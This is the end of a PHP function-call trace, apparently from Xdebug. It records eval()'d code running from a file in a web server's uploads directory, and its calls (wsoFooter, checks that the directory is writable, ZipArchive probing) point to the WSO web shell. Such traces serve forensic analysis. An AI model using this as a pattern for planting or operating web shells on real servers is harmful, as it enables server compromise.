4	222	0	0.016476	1155224	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'prepend.php'
4	222	1	0.016489	1155296
4	222	R			'prepend.php'
4	223	0	0.016502	1155288	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'prepend.php'
4	223	1	0.016515	1155360
4	223	R			'prepend.php'
4	224	0	0.016529	1155288	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'prepend.php'
4	224	1	0.016542	1155360
4	224	R			'prepend.php'
4	225	0	0.016555	1155448	urlencode	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1334	1	'prepend.php'
4	225	1	0.016568	1155520
4	225	R			'prepend.php'
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1336	$l = 0
4	226	0	0.016593	1154776	htmlspecialchars	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1344	1	'/var/www/html/uploads/'
4	226	1	0.016607	1154968
4	226	R			'/var/www/html/uploads/'
4	227	0	0.016775	1154776	class_exists	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1350	1	'ZipArchive'
4	227	1	0.016792	1154816
4	227	R			FALSE
4	228	0	0.016807	1154776	wsoFooter	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1368	0
5	229	0	0.016821	1154776	is_writable	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	537	1	'/var/www/html/uploads/'
5	229	1	0.016839	1154816
5	229	R			TRUE
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	537	$is_writable = ' <font color=\'green\'>(Writeable)</font>'
5	230	0	0.016867	1154776	htmlspecialchars	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	547	1	'/var/www/html/uploads/'
5	230	1	0.016882	1154968
5	230	R			'/var/www/html/uploads/'
4	228	1	0.016900	1154776
3	30	1	0.016910	1146776
			0.016947	1065232
TRACE END   [2023-02-13 00:32:56.707730]

